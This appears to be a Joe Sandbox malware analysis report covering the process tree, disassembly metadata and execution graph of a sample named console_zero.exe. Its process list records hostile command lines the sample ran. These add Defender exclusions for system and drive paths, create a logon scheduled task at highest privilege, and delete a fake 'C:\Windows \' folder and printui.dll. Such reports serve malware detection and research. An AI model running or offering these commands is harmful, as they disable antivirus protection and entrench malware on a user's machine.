                                                                                            General

                                                                                            Target ID:29
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:30
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:31
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:32
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\console_zero.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\console_zero.exe"
                                                                                            Imagebase:0x7ff70f270000
                                                                                            File size:664'576 bytes
                                                                                            MD5 hash:4ECCB8F5D1EDCF18A11ABED91FF85C46
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 42%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:33
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:34
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:35
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff63ed60000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:36
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:37
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:38
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:39
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:40
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:timeout /t 14 /nobreak
                                                                                            Imagebase:0x7ff63c990000
                                                                                            File size:32'768 bytes
                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:41
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:timeout /t 16 /nobreak
                                                                                            Imagebase:0x7ff63c990000
                                                                                            File size:32'768 bytes
                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:42
                                                                                            Start time:10:20:06
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\console_zero.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\console_zero.exe
                                                                                            Imagebase:0x7ff70f270000
                                                                                            File size:664'576 bytes
                                                                                            MD5 hash:4ECCB8F5D1EDCF18A11ABED91FF85C46
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:43
                                                                                            Start time:10:20:06
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:44
                                                                                            Start time:10:20:06
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:45
                                                                                            Start time:10:20:06
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff63ed60000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:46
                                                                                            Start time:10:20:07
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:47
                                                                                            Start time:10:20:07
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:48
                                                                                            Start time:10:20:07
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:49
                                                                                            Start time:10:20:10
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:50
                                                                                            Start time:10:20:10
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:51
                                                                                            Start time:10:20:10
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:52
                                                                                            Start time:10:20:13
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:53
                                                                                            Start time:10:20:13
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:54
                                                                                            Start time:10:20:13
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:56
                                                                                            Start time:10:20:20
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Non-executed Functions

                                                                                              Function 00007FF783AC6F94 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701104182.00007FF783AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF783AA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701083040.00007FF783AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1702273266.00007FF784898000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1702404346.00007FF78489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ff783aa0000_58VSNPxrI4.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                              • String ID:
                                                                                              • API String ID: 2933794660-0
                                                                                              • Opcode ID: c11a42863fb02dfb8797a2c878325fc12a919f5be676ba5f29d2ddb3a51f65d9
                                                                                              • Instruction ID: 2ccc9f0c3555c2dfcd7bd788613d70e7ccafd3b740d098e34dfe7b7e991ec160
                                                                                              • Opcode Fuzzy Hash: c11a42863fb02dfb8797a2c878325fc12a919f5be676ba5f29d2ddb3a51f65d9
                                                                                              • Instruction Fuzzy Hash: 49117336B14F0689EB40EF64EC542B873A4F719758F840E35EA6D82764DF78D164C350

                                                                                              Execution Graph

                                                                                              Execution Coverage:34.4%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:34.2%
                                                                                              Total number of Nodes:73
                                                                                              Total number of Limit Nodes:2
                                                                                              execution_graph 234 7ff616b11789 235 7ff616b11798 _exit 234->235 236 7ff616b117a1 234->236 235->236 237 7ff616b117b6 236->237 238 7ff616b117aa _cexit 236->238 238->237 187 7ff616b11520 __wgetmainargs 188 7ff616b11570 GetStartupInfoW 189 7ff616b115af 188->189 190 7ff616b115c1 189->190 191 7ff616b115ca Sleep 189->191 192 7ff616b115e6 _amsg_exit 190->192 194 7ff616b115f4 190->194 191->189 192->194 193 7ff616b1166a _initterm 196 7ff616b11687 _IsNonwritableInCurrentImage 193->196 194->193 195 7ff616b1164b 194->195 194->196 196->195 202 7ff616b110e0 HeapSetInformation 196->202 199 7ff616b11748 exit 200 7ff616b11750 199->200 200->195 201 7ff616b11759 _cexit 200->201 201->195 203 7ff616b11d26 202->203 204 7ff616b1112c LoadCursorW GetStockObject RegisterClassW CreateWindowExW RegCreateKeyExW 203->204 205 7ff616b11219 RegQueryValueExW 204->205 206 7ff616b112c4 GetLastError 204->206 207 7ff616b11252 205->207 208 7ff616b112d0 LoadLibraryExW 206->208 209 7ff616b11267 RegDeleteValueW 207->209 210 7ff616b1127e RegSetValueExW 207->210 215 7ff616b11258 207->215 211 7ff616b112fb GetProcAddress 208->211 212 7ff616b112eb GetLastError 208->212 209->215 216 7ff616b112b2 RegCloseKey 210->216 213 7ff616b11327 GetCommandLineW 211->213 214 7ff616b11319 GetLastError 211->214 217 7ff616b11361 RegOpenKeyExW 212->217 226 7ff616b11008 213->226 218 7ff616b11350 FreeLibrary 214->218 215->210 215->216 216->208 220 7ff616b113f9 GetLastError 217->220 221 7ff616b11394 RegQueryValueExW RegCloseKey RegDeleteKeyExW 217->221 218->217 223 7ff616b11405 220->223 221->223 224 7ff616b11419 223->224 225 7ff616b1140a DestroyWindow 223->225 224->199 224->200 225->224 227 7ff616b110ca 226->227 228 7ff616b11020 226->228 227->218 229 7ff616b11028 iswspace 228->229 232 7ff616b1103e 228->232 229->228 229->232 230 7ff616b11087 iswspace 231 7ff616b11051 230->231 230->232 231->227 233 7ff616b110b4 iswspace 231->233 232->227 232->230 232->231 233->227 233->231 239 7ff616b11880 SetUnhandledExceptionFilter 240 7ff616b11840 241 7ff616b11872 240->241 243 7ff616b1184f 240->243 242 7ff616b1186b ?terminate@ 242->241 243->241 243->242 244 7ff616b11440 246 7ff616b11452 244->246 251 7ff616b11908 GetModuleHandleW 246->251 247 7ff616b114b9 __set_app_type 248 7ff616b114f6 247->248 249 7ff616b1150c 248->249 250 7ff616b114ff __setusermatherr 248->250 250->249 252 7ff616b1191d 251->252 252->247 253 7ff616b117e0 256 7ff616b11a54 253->256 257 7ff616b11a80 6 API calls 256->257 258 7ff616b117e9 256->258 257->258 259 7ff616b11810 260 7ff616b11819 259->260 261 7ff616b11824 260->261 262 7ff616b11ba0 RtlCaptureContext RtlLookupFunctionEntry 260->262 263 7ff616b11c27 262->263 264 7ff616b11be5 RtlVirtualUnwind 262->264 267 7ff616b11b5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 263->267 264->263 268 7ff616b11d50 _XcptFilter

                                                                                              Callgraph

                                                                                              Executed Functions

                                                                                              Function 00007FF616B110E0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 195registrylibrarymemoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.1759120025.00007FF616B11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF616B10000, based on PE: true
                                                                                              • Associated: 0000000D.00000002.1759094187.00007FF616B10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759168982.00007FF616B14000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_7ff616b10000_printui.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                                                                                              • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                                                                                              • API String ID: 2613610799-4035671587
                                                                                              • Opcode ID: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                              • Instruction ID: 92632fab1c78ccaf58f9e7bbf5aafcbf2a168d4c17c74ffcd062a01cc0cebaa1
                                                                                              • Opcode Fuzzy Hash: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                              • Instruction Fuzzy Hash: BFA12B76A18E42DAEB208B50F4447ADBBB0FB4AB69F419131DE0E82B54DF3ED1658740
                                                                                              Function 00007FF616B11570 Relevance: 10.6, APIs: 7, Instructions: 143sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 27 7ff616b11570-7ff616b115ac GetStartupInfoW 28 7ff616b115af-7ff616b115ba 27->28 29 7ff616b115d7 28->29 30 7ff616b115bc-7ff616b115bf 28->30 33 7ff616b115dc-7ff616b115e4 29->33 31 7ff616b115ca-7ff616b115d5 Sleep 30->31 32 7ff616b115c1-7ff616b115c8 30->32 31->28 32->33 34 7ff616b115e6-7ff616b115f2 _amsg_exit 33->34 35 7ff616b115f4-7ff616b115fc 33->35 36 7ff616b11660-7ff616b11668 34->36 37 7ff616b115fe-7ff616b1161a 35->37 38 7ff616b11655 35->38 40 7ff616b11687-7ff616b11689 36->40 41 7ff616b1166a-7ff616b1167d _initterm 36->41 42 7ff616b1161e-7ff616b11621 37->42 39 7ff616b1165b 38->39 39->36 43 7ff616b1168b-7ff616b1168e 40->43 44 7ff616b11695-7ff616b1169c 40->44 41->40 45 7ff616b11647-7ff616b11649 42->45 46 7ff616b11623-7ff616b11625 42->46 43->44 49 7ff616b116c8-7ff616b116d5 44->49 50 7ff616b1169e-7ff616b116ac call 7ff616b119c0 44->50 45->39 48 7ff616b1164b-7ff616b11650 45->48 47 7ff616b11627-7ff616b1162a 46->47 46->48 51 7ff616b1163c-7ff616b11645 47->51 52 7ff616b1162c-7ff616b11638 47->52 55 7ff616b117b6-7ff616b117d3 48->55 53 7ff616b116d7-7ff616b116dc 49->53 54 7ff616b116e1-7ff616b116e6 49->54 50->49 59 7ff616b116ae-7ff616b116be 50->59 51->42 52->51 53->55 58 7ff616b116ea-7ff616b116f1 54->58 61 7ff616b11767-7ff616b1176b 58->61 62 7ff616b116f3-7ff616b116f6 58->62 59->49 63 7ff616b1177b-7ff616b11784 61->63 64 7ff616b1176d-7ff616b11777 61->64 65 7ff616b116f8-7ff616b116fa 62->65 66 7ff616b116fc-7ff616b11702 62->66 63->55 63->58 64->63 65->61 65->66 67 7ff616b11712-7ff616b11746 call 7ff616b110e0 66->67 68 7ff616b11704-7ff616b11710 66->68 71 7ff616b11748-7ff616b1174a exit 67->71 72 7ff616b11750-7ff616b11757 67->72 68->66 71->72 73 7ff616b11759-7ff616b1175f _cexit 72->73 74 7ff616b11765 72->74 73->74 74->55
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.1759120025.00007FF616B11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF616B10000, based on PE: true
                                                                                              • Associated: 0000000D.00000002.1759094187.00007FF616B10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759168982.00007FF616B14000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_7ff616b10000_printui.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                              • String ID:
                                                                                              • API String ID: 642454821-0
                                                                                              • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                              • Instruction ID: 5febd5241c552f3a7992fc33f1c345ebab1a3a09df9192a3ff2177dd4cbde0a5
                                                                                              • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                              • Instruction Fuzzy Hash: 5D614779A09E06A6EB708F11F54023972B5BB46FA1F144136DA4DD33A4EF3FE8A18700
                                                                                              Function 00007FF616B11520 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 75 7ff616b11520-7ff616b11568 __wgetmainargs
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.1759120025.00007FF616B11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF616B10000, based on PE: true
                                                                                              • Associated: 0000000D.00000002.1759094187.00007FF616B10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759168982.00007FF616B14000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_7ff616b10000_printui.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wgetmainargs
                                                                                              • String ID:
                                                                                              • API String ID: 1709950718-0
                                                                                              • Opcode ID: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                              • Instruction ID: 21be6137b4dcd520ab08a6df469c57035f0ae8e9405490271fe5336dfc8d6483
                                                                                              • Opcode Fuzzy Hash: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                              • Instruction Fuzzy Hash: 29E0597CD0AE47B5EA21CB50B84866437F0BB06B64B804031C50D92220EE3EA269CB44

                                                                                              Non-executed Functions

                                                                                              Function 00007FF616B11B5C Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.1759120025.00007FF616B11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF616B10000, based on PE: true
                                                                                              • Associated: 0000000D.00000002.1759094187.00007FF616B10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 0000000D.00000002.1759168982.00007FF616B14000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_7ff616b10000_printui.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1249254920-0
                                                                                              • Opcode ID: 67a69430592ab0ed5dfc45027a236bc3dcce14c44e9d99ca36710f20fe33c88e
                                                                                              • Instruction ID: 7d98d514236d36a9441bcb3766635a53f685d4851f77a2758407d8f31cd251ff
                                                                                              • Opcode Fuzzy Hash: 67a69430592ab0ed5dfc45027a236bc3dcce14c44e9d99ca36710f20fe33c88e
                                                                                              • Instruction Fuzzy Hash: A2D09E99A08D1696E7289762FC150351230AB5AF55B059034CF1A85360DD3F58F94200
                                                                                              Function 00007FF616B11880 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
